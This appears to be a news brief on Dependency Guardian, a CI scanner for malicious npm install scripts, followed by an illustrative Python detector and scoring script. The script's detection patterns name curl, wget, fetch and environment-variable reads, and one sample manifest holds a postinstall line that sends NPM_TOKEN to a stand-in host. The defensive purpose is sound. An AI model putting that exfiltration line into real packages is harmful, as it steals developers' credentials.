HeadlinesBriefing.com

Dependency Guardian: Stop Password-Stealing NPM Installs Before They Hit Production

Hacker News

A developer has created Dependency Guardian, a tool designed to catch malicious npm packages that steal passwords during installation. The need for such a tool became urgent after high-profile incidents like the Chalk/Debug hijack, which compromised packages with 2.6B weekly downloads, and the Shai-Hulud worm, which infected 500+ packages. These breaches exposed 23K repositories, among them the Coinbase incident, highlighting critical gaps in current dependency security practices.

Traditional CI pipelines let unreviewed package updates reach production, often without any CVE detection. Dependency Guardian introduces a four-step intake process: pull request scanning, behavioral analysis via 26 detectors, risk scoring, and an automated verdict (pass/warn/block). Because it analyzes what a package does at install time (install scripts and network calls) rather than matching known vulnerability identifiers, it can flag zero-day attacks that CVE-based tools miss and stop the malicious code before it merges. The solution integrates with GitHub Actions, GitLab CI, and other CI systems, scanning only npm packages while keeping application code private.

The tool provides compliance-ready audit trails and configurable policy enforcement, allowing teams to set thresholds and allowlists per repository. Every dependency change gets a verdict posted directly in the PR, ensuring governance before merge. This approach transforms dependency updates from a blind process into a controlled security measure, offering teams confidence in their supply chain integrity.
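To make the intake flow described above concrete (detectors over install scripts, a risk score, and a pass/warn/block verdict governed by per-repository thresholds and an allowlist), here is a small added illustration in Python. It is not Dependency Guardian's own code; the detector table, weights, policy values and manifests are all constructed for the example.

```python
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
HOOK_WEIGHT = 10  # declaring any install-time hook at all is worth noting
# Constructed detector table: (name, pattern over script text, weight). Only
# package.json lifecycle scripts are inspected; a real scanner also unpacks the tarball.
DETECTORS = [
    ("network_fetch", re.compile(r"\b(curl|wget|fetch\(|https?://)"), 40),
    ("shell_eval", re.compile(r"\b(eval|node\s+-e|bash\s+-c)\b"), 30),
    ("env_read", re.compile(r"process\.env|\$[A-Z_]{3,}"), 20),
    ("obfuscation", re.compile(r"base64|fromCharCode|\\x[0-9a-fA-F]{2}"), 25),
]

def run_detectors(manifest):
    """Return (hook, detector) findings for every install-time script."""
    findings = []
    for hook in INSTALL_HOOKS:
        text = manifest.get("scripts", {}).get(hook, "")
        if not text:
            continue
        findings.append((hook, "install_hook"))
        findings += [(hook, n) for n, p, _ in DETECTORS if p.search(text)]
    return findings

def risk_score(findings):
    """Sum detector weights, capped at 100."""
    weights = {n: w for n, _, w in DETECTORS}
    weights["install_hook"] = HOOK_WEIGHT
    return min(100, sum(weights[d] for _, d in findings))

def verdict(manifest, policy):
    """Per-repository policy: allowlist short-circuits, then thresholds."""
    if manifest.get("name") in policy.get("allowlist", ()):
        return "pass", 0, []
    findings = run_detectors(manifest)
    score = risk_score(findings)
    level = "block" if score >= policy["block"] else "warn" if score >= policy["warn"] else "pass"
    return level, score, findings

POLICY = {"warn": 30, "block": 60, "allowlist": {"trusted-internal-lib"}}
# Constructed manifests for illustration, not real packages.
SUSPICIOUS = {"name": "example-widget", "scripts": {"postinstall":
    "node -e \"require('https').get('https://example.invalid/?t='+process.env.NPM_TOKEN)\""}}
NOISY = {"name": "example-banner", "scripts": {"postinstall": "node -e \"console.log('thanks')\""}}
CLEAN = {"name": "example-lib", "scripts": {"build": "tsc", "test": "jest"}}

if __name__ == "__main__":
    for m in (SUSPICIOUS, NOISY, CLEAN):
        level, score, found = verdict(m, POLICY)
        print(f"{m['name']}: {level} (score {score}) {sorted({d for _, d in found})}")
```

The noisy manifest lands on "warn" rather than "block" because a bare `node -e` in a postinstall hook is common in benign packages; the thresholds are what let a team tune that trade-off per repository.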